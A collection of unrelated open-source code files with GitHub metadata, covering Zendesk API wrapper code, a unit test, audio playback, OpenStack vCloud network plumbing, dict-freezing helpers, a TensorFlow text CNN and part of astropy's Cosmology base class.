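    inputs.set_Password('password')
    inputs.set_Server('example.zendesk.com')
    results = choreo.execute_with_results(inputs)
    return results.get_Response()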
| {
"content_hash": "790a0a839a1a7b7c98df05b85508fddb",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 202,
"avg_line_length": 42.151162790697676,
"alnum_prop": 0.6772413793103448,
"repo_name": "jordanemedlock/psychtruths",
"id": "a88f5b00dde9bba13ad84aec34cf4a52b71e4789",
"size": "4480",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/Library/Zendesk/Tickets/ListRecent.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
"""Tests for identity_function."""
from absl.testing import absltest
from pydemos.mock_test import identity_function
class IdentityFunctionTest(absltest.TestCase):
def test_identity_function(self):
self.assertEqual(1, identity_function.identity_function(1))
if __name__ == '__main__':
absltest.main()
| {
"content_hash": "ac3bb423fe20230f5b9353c72718f9d9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 63,
"avg_line_length": 24.153846153846153,
"alnum_prop": 0.7420382165605095,
"repo_name": "google-research/pydemos",
"id": "5cf9cd47445ff8645749df703b9c594809ddd25f",
"size": "899",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pydemos/mock_test/identity_function_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1927"
},
{
"name": "HTML",
"bytes": "3795"
},
{
"name": "JavaScript",
"bytes": "2408"
},
{
"name": "Python",
"bytes": "111079"
},
{
"name": "Shell",
"bytes": "180"
},
{
"name": "Svelte",
"bytes": "4126"
},
{
"name": "TypeScript",
"bytes": "20257"
}
],
"symlink_target": ""
} |
"""Hardware interfaces for sound output"""
# Authors: Dan McCloy <drmccloy@uw.edu>
# Eric Larson <larsoner@uw.edu>
#
# License: BSD (3-clause)
import numpy as np
from scipy import fftpack
import sys
import os
import pyglet
_use_silent = (os.getenv('_EXPYFUN_SILENT', '') == 'true')
_opts_dict = dict(linux2=('pulse',),
win32=('directsound',),
darwin=('openal',))
_opts_dict['linux'] = _opts_dict['linux2'] # new name on Py3k
_driver = _opts_dict[sys.platform] if not _use_silent else ('silent',)
pyglet.options['audio'] = _driver
# these must follow the above option setting, so PEP8 complains
from pyglet.media import Player, AudioFormat, SourceGroup # noqa
try:
from pyglet.media import StaticMemorySource
except ImportError:
from pyglet.media.sources.base import StaticMemorySource # noqa
from ._utils import logger, flush_logger # noqa
def _check_pyglet_audio():
if pyglet.media.get_audio_driver() is None:
raise SystemError('pyglet audio ("%s") could not be initialized'
% pyglet.options['audio'][0])
class SoundPlayer(Player):
def __init__(self, data, fs, loop=False):
assert AudioFormat is not None
super(SoundPlayer, self).__init__()
_check_pyglet_audio()
sms = _as_static(data, fs)
group = SourceGroup(sms.audio_format, None)
group.loop = bool(loop)
group.queue(sms)
self.queue(group)
def stop(self):
self.pause()
self.seek(0.)
class PygletSoundController(object):
"""Use pyglet audio capabilities"""
def __init__(self, ec, stim_fs):
logger.info('Expyfun: Setting up Pyglet audio')
assert AudioFormat is not None
self.fs = stim_fs
# Need to generate at RMS=1 to match TDT circuit
noise = np.random.normal(0, 1.0, int(self.fs * 15.)) # 15 secs
# Low-pass if necessary
if stim_fs < self.fs:
# note we can use cheap DFT method here b/c
# circular convolution won't matter for AWGN (yay!)
freqs = fftpack.fftfreq(len(noise), 1. / self.fs)
noise = fftpack.fft(noise)
noise[np.abs(freqs) > stim_fs / 2.] = 0.0
noise = np.real(fftpack.ifft(noise))
# ensure true RMS of 1.0 (DFT method also lowers RMS, compensate here)
noise = noise / np.sqrt(np.mean(noise * noise))
self.noise_array = np.array((noise, -1.0 * noise))
self.noise = SoundPlayer(self.noise_array, self.fs, loop=True)
self._noise_playing = False
self.audio = SoundPlayer(np.zeros((2, 1)), self.fs)
self.ec = ec
flush_logger()
def start_noise(self):
if not self._noise_playing:
self.noise.play()
self._noise_playing = True
def stop_noise(self):
if self._noise_playing:
self.noise.stop()
self._noise_playing = False
def clear_buffer(self):
self.audio.delete()
self.audio = SoundPlayer(np.zeros((2, 1)), self.fs)
def load_buffer(self, samples):
self.audio.delete()
self.audio = SoundPlayer(samples.T, self.fs)
def play(self):
self.audio.play()
self.ec._stamp_ttl_triggers([1])
def stop(self):
self.audio.stop()
def set_noise_level(self, level):
new_noise = SoundPlayer(self.noise_array * level, self.fs, loop=True)
if self._noise_playing:
self.stop_noise()
self.noise.delete()
self.noise = new_noise
self.start_noise()
else:
self.noise = new_noise
def halt(self):
self.stop()
self.stop_noise()
# cleanup pyglet instances
self.audio.delete()
self.noise.delete()
def _as_static(data, fs):
"""Helper to get data into the Pyglet audio format"""
fs = int(fs)
if data.ndim not in (1, 2):
raise ValueError('Data must have one or two dimensions')
n_ch = data.shape[0] if data.ndim == 2 else 1
audio_format = AudioFormat(channels=n_ch, sample_size=16,
sample_rate=fs)
data = data.T.ravel('C')
data[data < -1] = -1
data[data > 1] = 1
data = (data * (2 ** 15)).astype('int16').tostring()
return StaticMemorySourceFixed(data, audio_format)
class StaticMemorySourceFixed(StaticMemorySource):
"""Stupid class to fix old Pyglet bug"""
def _get_queue_source(self):
return self
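# A hedged usage sketch (never called by expyfun itself): SoundPlayer expects
# an (n_channels, n_samples) array scaled to +/- 1; the half-second 440 Hz
# tone below is illustrative only.
def _sound_player_example():
    fs = 44100
    t = np.arange(int(fs * 0.5)) / float(fs)
    tone = 0.5 * np.sin(2 * np.pi * 440. * t)
    player = SoundPlayer(np.array([tone, tone]), fs)  # stereo: same tone in both channels
    player.play()
    return player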
| {
"content_hash": "f12b4d14b59803f5f352d5de2bc3d484",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 78,
"avg_line_length": 31.291666666666668,
"alnum_prop": 0.596537949400799,
"repo_name": "lkishline/expyfun",
"id": "50a22872fef9554d01c585591ce8c376e01b6dc0",
"size": "4506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "expyfun/_sound_controllers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1018"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "390894"
}
],
"symlink_target": ""
} |
"""
Network utilities for the vcloudapi driver.
"""
import re
import contextlib
from oslo.config import cfg
from oslo.vmware import api
from oslo.vmware import vim
import suds
from nova import exception
from nova import utils
from nova.i18n import _, _LI, _LW
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova.virt import driver
from nova.virt.vcloudapi import vcenter_utils
from nova.virt.vcloudapi import network_utils
from nova.network import linux_net
from nova.network import model as network_model
LOG = logging.getLogger(__name__)
def create_org_vdc_network(session, org_vdc_name, vif):
"""use the vif to create_org_vdc_network
now we just use the vif id to create a port, so we
can find it's properties like vlanid in vcenter
"""
create_orgvdcnetwork_with_name(session, org_vdc_name, vif['id'])
    # return the network name we just used
return vif['id']
def create_orgvdcnetwork_with_name(session, org_vdc_name, network_name):
gateway_name = ''
start_address = '192.168.0.1'
end_address = '192.168.0.253'
gateway_ip = '192.168.0.254'
netmask = '255.255.255.0'
result, task = session._call_method(session.vca,
"create_isolated_vdc_network",
org_vdc_name, network_name,
gateway_name, start_address,
end_address, gateway_ip,
netmask)
# check the task is success or not
if not result:
raise exception.NovaException(
"Create_org_network error, task:" +
task)
session._wait_for_task(task)
def delete_org_vdc_network(session, org_vdc_name, vif):
"""use the vif to create_org_vdc_network
now we just use the vif id to create a port, so we
can find it's properties like vlanid in vcenter
"""
delete_orgvdcnetwork_with_name(session, org_vdc_name, vif['id'])
    # return the network name we just deleted
return vif['id']
def delete_orgvdcnetwork_with_name(session, org_vdc_name, network_name):
"""delete the org vdc network with given name """
result, task = session._call_method(session.vca, "delete_isolated_vdc_network",
org_vdc_name, network_name)
# check the task is success or not
if not result:
raise exception.NovaException(
"Delete_org_network error, task:" +
task)
session._wait_for_task(task)
def plug_vif(vcenter_api, instance, vif, ovsport_info):
"""link the pg which name contains the network_name to the
compute node bridge"""
vlan_id, dvs_name = vcenter_api.get_dvs_and_vlanid_with_pgname_alias(
vif['id'][:network_model.NIC_NAME_LEN])
    # TODO(nkapotoxin): check whether the dvs_name is correct
plug_ovs_hybrid(instance, vif, ovsport_info, vlan_id)
def plug_ovs_hybrid(instance, vif, ovsport_info, vlan_id):
"""Plug using hybrid strategy
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal OVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms.
"""
iface_id = get_ovs_interfaceid(vif)
br_name = get_br_name(vif['id'])
v1_name, v2_name = get_veth_pair_names(vif['id'])
gbr_name = get_gbr_name(vif['id'])
tap_name, taq_name = get_gveth_pair_names(vif['id'])
ovs_nicport = ovsport_info['ovs_ethport']
vlan_tag = str(vlan_id)
nic_name = ovs_nicport + '.' + vlan_tag
# add the first gbr to connect to the origin qbr
if not linux_net.device_exists(gbr_name):
utils.execute('brctl', 'addbr', gbr_name, run_as_root=True)
utils.execute('brctl', 'setfd', gbr_name, 0, run_as_root=True)
utils.execute('brctl', 'stp', gbr_name, 'off', run_as_root=True)
utils.execute('tee',
('/sys/class/net/%s/bridge/multicast_snooping' %
gbr_name),
process_input='0',
run_as_root=True,
check_exit_code=[0, 1])
if linux_net.device_exists(nic_name):
        # try to delete the existing nic_name from whatever br it is in
utils.execute('vconfig', 'rem', nic_name, run_as_root=True)
if not linux_net.device_exists(tap_name):
linux_net._create_veth_pair(tap_name, taq_name)
utils.execute(
'ip',
'link',
'set',
gbr_name,
'up',
run_as_root=True)
utils.execute(
'brctl',
'addif',
gbr_name,
taq_name,
run_as_root=True)
# add the second qbr to connect to the origin ovs br-int
if not linux_net.device_exists(br_name):
utils.execute('brctl', 'addbr', br_name, run_as_root=True)
utils.execute('brctl', 'setfd', br_name, 0, run_as_root=True)
utils.execute('brctl', 'stp', br_name, 'off', run_as_root=True)
utils.execute('tee',
('/sys/class/net/%s/bridge/multicast_snooping' %
br_name),
process_input='0',
run_as_root=True,
check_exit_code=[0, 1])
utils.execute(
'brctl',
'addif',
br_name,
tap_name,
run_as_root=True)
if not linux_net.device_exists(v2_name):
linux_net._create_veth_pair(v1_name, v2_name)
utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
linux_net.create_ovs_vif_port(get_bridge_name(vif),
v2_name, iface_id, vif['address'],
instance['uuid'])
# connect qbrxxxx to nic
if not linux_net.device_exists(nic_name):
try:
# ifup ovs_ethport
utils.execute('ifconfig', ovs_nicport, 'up', run_as_root=True)
# add brif
utils.execute('vconfig', 'add', ovs_nicport, vlan_tag,
run_as_root=True)
# up the if
utils.execute('ifconfig', nic_name, 'up', run_as_root=True)
connect_nic_to_br(instance, gbr_name, nic_name)
except Exception as exc:
LOG.exception(exc, instance=instance)
LOG.debug(
        'Connect nic to br finished, vif: %s',
vif,
instance=instance)
def get_ovs_interfaceid(vif):
return vif.get('ovs_interfaceid') or vif['id']
def get_br_name(iface_id):
return ("qbr" + iface_id)[:network_model.NIC_NAME_LEN]
def get_gbr_name(iface_id):
"""generate the security supported br"""
return ("qgr" + iface_id)[:network_model.NIC_NAME_LEN]
def get_gveth_pair_names(iface_id):
"""generate the security supported pair veth"""
return (("tap%s" % iface_id)[:network_model.NIC_NAME_LEN],
("taq%s" % iface_id)[:network_model.NIC_NAME_LEN])
def get_veth_pair_names(iface_id):
return (("qvb%s" % iface_id)[:network_model.NIC_NAME_LEN],
("qvo%s" % iface_id)[:network_model.NIC_NAME_LEN])
def connect_nic_to_br(instance, br_name, nic_name):
utils.execute('brctl', 'addif', br_name, nic_name, run_as_root=True)
def get_bridge_name(vif):
return vif['network']['bridge']
def unplug_vif(vcenter_api, instance, vif, ovsport_info):
"""link the pg which name contains the network_name to the
compute node bridge"""
vlan_id, dvs_name = vcenter_api.get_dvs_and_vlanid_with_pgname_alias(
vif['id'][:network_model.NIC_NAME_LEN])
    # TODO: check whether the dvs_name is correct
if vlan_id is not None:
unplug_ovs(instance, vif, ovsport_info, vlan_id)
def unplug_ovs(instance, vif, ovsport_info,
vlan_id):
unplug_ovs_hybrid(
instance,
vif,
ovsport_info,
vlan_id)
def unplug_ovs_hybrid(
instance, vif, ovsport_info, vlan_id):
"""UnPlug using hybrid strategy
Unhook port from OVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
    # now the driver uses the configured nic (e.g. eth0.100) instead
ovs_nicport = ovsport_info['ovs_ethport']
vlan_tag = str(vlan_id)
nic_name = ovs_nicport + '.' + vlan_tag
# remove the eth1 vlan config
try:
        # try to delete the existing nic_name from whatever br it is in
utils.execute('vconfig', 'rem', nic_name, run_as_root=True)
except Exception as exc:
LOG.exception(exc, instance=instance)
try:
br_name = get_br_name(vif['id'])
v1_name, v2_name = get_veth_pair_names(vif['id'])
gbr_name = get_gbr_name(vif['id'])
tap_name, taq_name = get_gveth_pair_names(vif['id'])
if linux_net.device_exists(br_name):
utils.execute('brctl', 'delif', br_name, v1_name,
run_as_root=True)
utils.execute('brctl', 'delif', br_name, tap_name,
run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name,
run_as_root=True)
linux_net.delete_ovs_vif_port(get_bridge_name(vif),
v2_name)
if linux_net.device_exists(gbr_name):
utils.execute('brctl', 'delif', gbr_name, taq_name,
run_as_root=True)
utils.execute('ip', 'link', 'set', gbr_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', gbr_name,
run_as_root=True)
# delete veth peer
linux_net.delete_net_dev(v1_name)
linux_net.delete_net_dev(v2_name)
linux_net.delete_net_dev(tap_name)
linux_net.delete_net_dev(taq_name)
except Exception as exc:
LOG.exception(exc, instance=instance)
def unplug_ovs_bridge(instance, vif):
"""No manual unplugging required."""
pass
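# A hedged illustration of the naming helpers above (never called by the
# driver): every per-port device name is its scheme prefix plus the port id,
# truncated to network_model.NIC_NAME_LEN characters, so the Linux bridge,
# the security bridge and the veth peers of one port all share the same
# shortened id. The port id below is made up.
def _port_device_names_example():
    port_id = '1f2e3d4c-5b6a-7980-aaaa-bbbbccccdddd'
    return {
        'linux_bridge': get_br_name(port_id),
        'security_bridge': get_gbr_name(port_id),
        'veth_pair': get_veth_pair_names(port_id),
        'gveth_pair': get_gveth_pair_names(port_id),
    }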
| {
"content_hash": "07741df89229aa2d09be1979ac6eab8f",
"timestamp": "",
"source": "github",
"line_count": 311,
"max_line_length": 83,
"avg_line_length": 33.19614147909968,
"alnum_prop": 0.5814606741573034,
"repo_name": "Hybrid-Cloud/badam",
"id": "775a30358b68d58bc6bdea1ebb30db39f15214a1",
"size": "10937",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hybrid_cloud_patches/python/nova/virt/vcloudapi/vcloud_network_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "3817"
},
{
"name": "Python",
"bytes": "29372474"
},
{
"name": "Shell",
"bytes": "17334"
}
],
"symlink_target": ""
} |
from frozendict import frozendict
def freeze(o):
t = type(o)
if t is dict:
return frozendict({k: freeze(v) for k, v in o.items()})
if t is frozendict:
return o
if t is str or t is unicode:
return o
try:
return tuple([freeze(i) for i in o])
except TypeError:
pass
return o
def unfreeze(o):
t = type(o)
if t is dict or t is frozendict:
return dict({k: unfreeze(v) for k, v in o.items()})
if t is str or t is unicode:
return o
try:
return [unfreeze(i) for i in o]
except TypeError:
pass
return o
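# A hedged usage sketch (illustrative only, never called): freeze() turns
# nested dicts into frozendicts and other iterables into tuples so the result
# can be hashed (e.g. used as a dict key); unfreeze() reverses the conversion.
def _freeze_example():
    state = {"user": {"name": "alice"}, "rooms": ["a", "b"]}
    frozen = freeze(state)
    cache = {frozen: "cached value"}  # hashable, so usable as a key
    assert unfreeze(frozen) == state  # round-trips back to plain dicts/lists
    return cache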
| {
"content_hash": "da7fdb0c59dedf29c81bbbba07bdd9ef",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 63,
"avg_line_length": 17.444444444444443,
"alnum_prop": 0.554140127388535,
"repo_name": "iot-factory/synapse",
"id": "9e10d37aec4bb78496442347d5a2feb983cc886e",
"size": "1237",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "synapse/util/frozenutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2000"
},
{
"name": "HTML",
"bytes": "2905"
},
{
"name": "JavaScript",
"bytes": "176441"
},
{
"name": "Perl",
"bytes": "31842"
},
{
"name": "Python",
"bytes": "1879672"
},
{
"name": "Shell",
"bytes": "4548"
}
],
"symlink_target": ""
} |
import tensorflow as tf
import numpy as np
from neuralnet.highway import highway
class single_cnn_highway(object):
def __init__(self, sequence_length, num_classes, vocab_size, embedding_size, filter_sizes, num_filters, l2_reg_lambda = 0.0, label_smoothing = 0.0, dropout_keep_prob = 0.5):
# Placeholders for input, output and dropout
self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name = "input_x")
self.input_y = tf.placeholder(tf.int32, [None, num_classes], name = "input_y")
self.seq_len = tf.placeholder(tf.int32, [None], name = "seq_len")
self.batch_size = tf.placeholder(tf.int32, name = "batch_size")
self.dropout_keep_prob = tf.placeholder(tf.float32, name = "dropout_keep_prob")
self.label_smoothing = label_smoothing
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.device('/cpu:0'), tf.name_scope("embedding"), tf.variable_scope("CNN") as scope:
self.embedded_W = tf.Variable(
tf.random_uniform([vocab_size, embedding_size], dtype=tf.float32, minval=-1.0, maxval=1.0),
name="W")
self.embedded_chars = tf.nn.embedding_lookup(self.embedded_W, self.input_x)
split_chars = tf.split(1, sequence_length, self.embedded_chars)
#print(tf.shape(split_chars[0]))
split_chars_highway = []
#scope.reuse_variables()
for idx in range(sequence_length):
if idx != 0:
scope.reuse_variables()
tmp = highway(tf.reshape(split_chars[idx], [-1, embedding_size]), embedding_size, layer_size = 2)
split_chars_highway.append(tf.expand_dims(tmp, 0))
split_chars_highway = tf.concat(0, split_chars_highway)
split_chars_highway = tf.transpose(split_chars_highway, [1, 0, 2])
self.embedded_chars_expanded = tf.expand_dims(split_chars_highway, -1)
#self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s" % filter_size):
# Convolution Layer
filter_shape = [filter_size, embedding_size, 1, num_filters]
W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name="b")
conv = tf.nn.conv2d(
self.embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# Maxpooling over the outputs
pooled = tf.nn.max_pool(
h,
ksize=[1, sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID',
name="pool")
pooled_outputs.append(pooled)
# Combine all the pooled features
num_filters_total = num_filters * len(filter_sizes)
self.h_pool = tf.concat(3, pooled_outputs)
self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])
# Add dropout
with tf.name_scope("dropout"):
self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)
#self.h_drop = self.h_pool_flat
# self.h_drop = highway(self.h_drop, self.h_drop.get_shape()[1], 4, 0.1)
# Final (unnormalized) scores and predictions
with tf.name_scope("output"):
W = tf.get_variable(
"W",
shape=[num_filters_total, num_classes],
initializer=tf.contrib.layers.xavier_initializer())
b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name="b")
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
self.scores = tf.nn.log_softmax(tf.nn.xw_plus_b(self.h_drop, W, b, name="scores"))
self.predictions = tf.argmax(self.scores, 1, name="predictions")
# CalculateMean cross-entropy loss
with tf.name_scope("loss"):
losses = tf.contrib.losses.softmax_cross_entropy(self.scores, self.input_y, label_smoothing = self.label_smoothing)
selflosses = tf.contrib.losses.softmax_cross_entropy(tf.cast(self.input_y, tf.float32),
tf.cast(self.input_y, tf.float32), label_smoothing = self.label_smoothing)
self.kl = tf.reduce_mean(losses - selflosses)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
# Accuracy
with tf.name_scope("accuracy"):
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
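# A hedged construction sketch (never called; uses the same TF 0.x-era API as
# the class above). The hyper-parameters are placeholders only; feed input_x,
# input_y and dropout_keep_prob when running the graph in a session.
def _build_model_example():
    return single_cnn_highway(
        sequence_length=56, num_classes=2, vocab_size=20000,
        embedding_size=128, filter_sizes=[3, 4, 5], num_filters=100,
        l2_reg_lambda=0.1)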
| {
"content_hash": "b3b0bec0dadd187f91ecdc5ae9ec70f7",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 177,
"avg_line_length": 51.009803921568626,
"alnum_prop": 0.5708245243128964,
"repo_name": "windowsyuli/cross_domain",
"id": "13839f856b62f11e213681e5db831b6fafea3f92",
"size": "5203",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neuralnet/single_cnn_highway.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "50032"
},
{
"name": "Makefile",
"bytes": "718"
},
{
"name": "Python",
"bytes": "120906"
},
{
"name": "Shell",
"bytes": "10170"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import abc
import inspect
from typing import TYPE_CHECKING, Any, Mapping, TypeVar
import numpy as np
from astropy.io.registry import UnifiedReadWriteMethod
from astropy.utils.decorators import classproperty
from astropy.utils.metadata import MetaData
from .connect import (
CosmologyFromFormat,
CosmologyRead,
CosmologyToFormat,
CosmologyWrite,
)
from .parameter import Parameter
if TYPE_CHECKING: # pragma: no cover
from astropy.cosmology.funcs.comparison import _FormatType
# Originally authored by Andrew Becker (becker@astro.washington.edu),
# and modified by Neil Crighton (neilcrighton@gmail.com), Roban Kramer
# (robanhk@gmail.com), and Nathaniel Starkman (n.starkman@mail.utoronto.ca).
# Many of these adapted from Hogg 1999, astro-ph/9905116
# and Linder 2003, PRL 90, 91301
__all__ = ["Cosmology", "CosmologyError", "FlatCosmologyMixin"]
__doctest_requires__ = {} # needed until __getattr__ removed
##############################################################################
# Parameters
# registry of cosmology classes with {key=name : value=class}
_COSMOLOGY_CLASSES = dict()
# typing
_CosmoT = TypeVar("_CosmoT", bound="Cosmology")
_FlatCosmoT = TypeVar("_FlatCosmoT", bound="FlatCosmologyMixin")
##############################################################################
class CosmologyError(Exception):
pass
class Cosmology(metaclass=abc.ABCMeta):
"""Base-class for all Cosmologies.
Parameters
----------
*args
Arguments into the cosmology; used by subclasses, not this base class.
name : str or None (optional, keyword-only)
The name of the cosmology.
meta : dict or None (optional, keyword-only)
Metadata for the cosmology, e.g., a reference.
**kwargs
Arguments into the cosmology; used by subclasses, not this base class.
Notes
-----
Class instances are static -- you cannot (and should not) change the values
of the parameters. That is, all of the above attributes (except meta) are
read only.
For details on how to create performant custom subclasses, see the
documentation on :ref:`astropy-cosmology-fast-integrals`.
"""
meta = MetaData()
# Unified I/O object interchange methods
from_format = UnifiedReadWriteMethod(CosmologyFromFormat)
to_format = UnifiedReadWriteMethod(CosmologyToFormat)
# Unified I/O read and write methods
read = UnifiedReadWriteMethod(CosmologyRead)
write = UnifiedReadWriteMethod(CosmologyWrite)
# Parameters
__parameters__: tuple[str, ...] = ()
__all_parameters__: tuple[str, ...] = ()
# ---------------------------------------------------------------
def __init_subclass__(cls):
super().__init_subclass__()
# -------------------
# Parameters
# Get parameters that are still Parameters, either in this class or above.
parameters = []
derived_parameters = []
for n in cls.__parameters__:
p = getattr(cls, n)
if isinstance(p, Parameter):
derived_parameters.append(n) if p.derived else parameters.append(n)
# Add new parameter definitions
for n, v in cls.__dict__.items():
if n in parameters or n.startswith("_") or not isinstance(v, Parameter):
continue
derived_parameters.append(n) if v.derived else parameters.append(n)
# reorder to match signature
ordered = [
parameters.pop(parameters.index(n))
for n in cls._init_signature.parameters.keys()
if n in parameters
]
parameters = ordered + parameters # place "unordered" at the end
cls.__parameters__ = tuple(parameters)
cls.__all_parameters__ = cls.__parameters__ + tuple(derived_parameters)
# -------------------
# register as a Cosmology subclass
_COSMOLOGY_CLASSES[cls.__qualname__] = cls
@classproperty(lazy=True)
def _init_signature(cls):
"""Initialization signature (without 'self')."""
# get signature, dropping "self" by taking arguments [1:]
sig = inspect.signature(cls.__init__)
sig = sig.replace(parameters=list(sig.parameters.values())[1:])
return sig
# ---------------------------------------------------------------
def __init__(self, name=None, meta=None):
self._name = str(name) if name is not None else name
self.meta.update(meta or {})
@property
def name(self):
"""The name of the Cosmology instance."""
return self._name
@property
@abc.abstractmethod
def is_flat(self):
"""
Return bool; `True` if the cosmology is flat.
This is abstract and must be defined in subclasses.
"""
raise NotImplementedError("is_flat is not implemented")
def clone(self, *, meta=None, **kwargs):
"""Returns a copy of this object with updated parameters, as specified.
This cannot be used to change the type of the cosmology, so ``clone()``
cannot be used to change between flat and non-flat cosmologies.
Parameters
----------
meta : mapping or None (optional, keyword-only)
Metadata that will update the current metadata.
**kwargs
Cosmology parameter (and name) modifications. If any parameter is
changed and a new name is not given, the name will be set to "[old
name] (modified)".
Returns
-------
newcosmo : `~astropy.cosmology.Cosmology` subclass instance
A new instance of this class with updated parameters as specified.
If no arguments are given, then a reference to this object is
returned instead of copy.
Examples
--------
To make a copy of the ``Planck13`` cosmology with a different matter
density (``Om0``), and a new name:
>>> from astropy.cosmology import Planck13
>>> Planck13.clone(name="Modified Planck 2013", Om0=0.35)
FlatLambdaCDM(name="Modified Planck 2013", H0=67.77 km / (Mpc s),
Om0=0.35, ...
If no name is specified, the new name will note the modification.
>>> Planck13.clone(Om0=0.35).name
'Planck13 (modified)'
"""
# Quick return check, taking advantage of the Cosmology immutability.
if meta is None and not kwargs:
return self
# There are changed parameter or metadata values.
# The name needs to be changed accordingly, if it wasn't already.
_modname = self.name + " (modified)"
kwargs.setdefault("name", (_modname if self.name is not None else None))
# mix new meta into existing, preferring the former.
meta = meta if meta is not None else {}
new_meta = {**self.meta, **meta}
# Mix kwargs into initial arguments, preferring the former.
new_init = {**self._init_arguments, "meta": new_meta, **kwargs}
# Create BoundArgument to handle args versus kwargs.
# This also handles all errors from mismatched arguments
ba = self._init_signature.bind_partial(**new_init)
# Instantiate, respecting args vs kwargs
cloned = type(self)(*ba.args, **ba.kwargs)
# Check if nothing has changed.
# TODO! or should return self?
if (cloned.name == _modname) and not meta and cloned.is_equivalent(self):
cloned._name = self.name
return cloned
@property
def _init_arguments(self):
# parameters
kw = {n: getattr(self, n) for n in self.__parameters__}
# other info
kw["name"] = self.name
kw["meta"] = self.meta
return kw
# ---------------------------------------------------------------
# comparison methods
def is_equivalent(self, other: Any, /, *, format: _FormatType = False) -> bool:
r"""Check equivalence between Cosmologies.
Two cosmologies may be equivalent even if not the same class.
For example, an instance of ``LambdaCDM`` might have :math:`\Omega_0=1`
and :math:`\Omega_k=0` and therefore be flat, like ``FlatLambdaCDM``.
Parameters
----------
other : `~astropy.cosmology.Cosmology` subclass instance, positional-only
The object to which to compare.
format : bool or None or str, optional keyword-only
Whether to allow, before equivalence is checked, the object to be
converted to a |Cosmology|. This allows, e.g. a |Table| to be
equivalent to a Cosmology.
`False` (default) will not allow conversion. `True` or `None` will,
and will use the auto-identification to try to infer the correct
format. A `str` is assumed to be the correct format to use when
converting.
``format`` is broadcast to match the shape of ``other``.
Note that the cosmology arguments are not broadcast against
``format``, so it cannot determine the output shape.
Returns
-------
bool
True if cosmologies are equivalent, False otherwise.
Examples
--------
Two cosmologies may be equivalent even if not of the same class.
In this examples the ``LambdaCDM`` has ``Ode0`` set to the same value
calculated in ``FlatLambdaCDM``.
>>> import astropy.units as u
>>> from astropy.cosmology import LambdaCDM, FlatLambdaCDM
>>> cosmo1 = LambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3, 0.7)
>>> cosmo2 = FlatLambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3)
>>> cosmo1.is_equivalent(cosmo2)
True
While in this example, the cosmologies are not equivalent.
>>> cosmo3 = FlatLambdaCDM(70 * (u.km/u.s/u.Mpc), 0.3, Tcmb0=3 * u.K)
>>> cosmo3.is_equivalent(cosmo2)
False
Also, using the keyword argument, the notion of equivalence is extended
to any Python object that can be converted to a |Cosmology|.
>>> from astropy.cosmology import Planck18
>>> tbl = Planck18.to_format("astropy.table")
>>> Planck18.is_equivalent(tbl, format=True)
True
The list of valid formats, e.g. the |Table| in this example, may be
checked with ``Cosmology.from_format.list_formats()``.
As can be seen in the list of formats, not all formats can be
auto-identified by ``Cosmology.from_format.registry``. Objects of
these kinds can still be checked for equivalence, but the correct
format string must be used.
>>> tbl = Planck18.to_format("yaml")
>>> Planck18.is_equivalent(tbl, format="yaml")
True
"""
from .funcs import cosmology_equal
try:
return cosmology_equal(
self, other, format=(None, format), allow_equivalent=True
)
except Exception:
# `is_equivalent` allows `other` to be any object and returns False
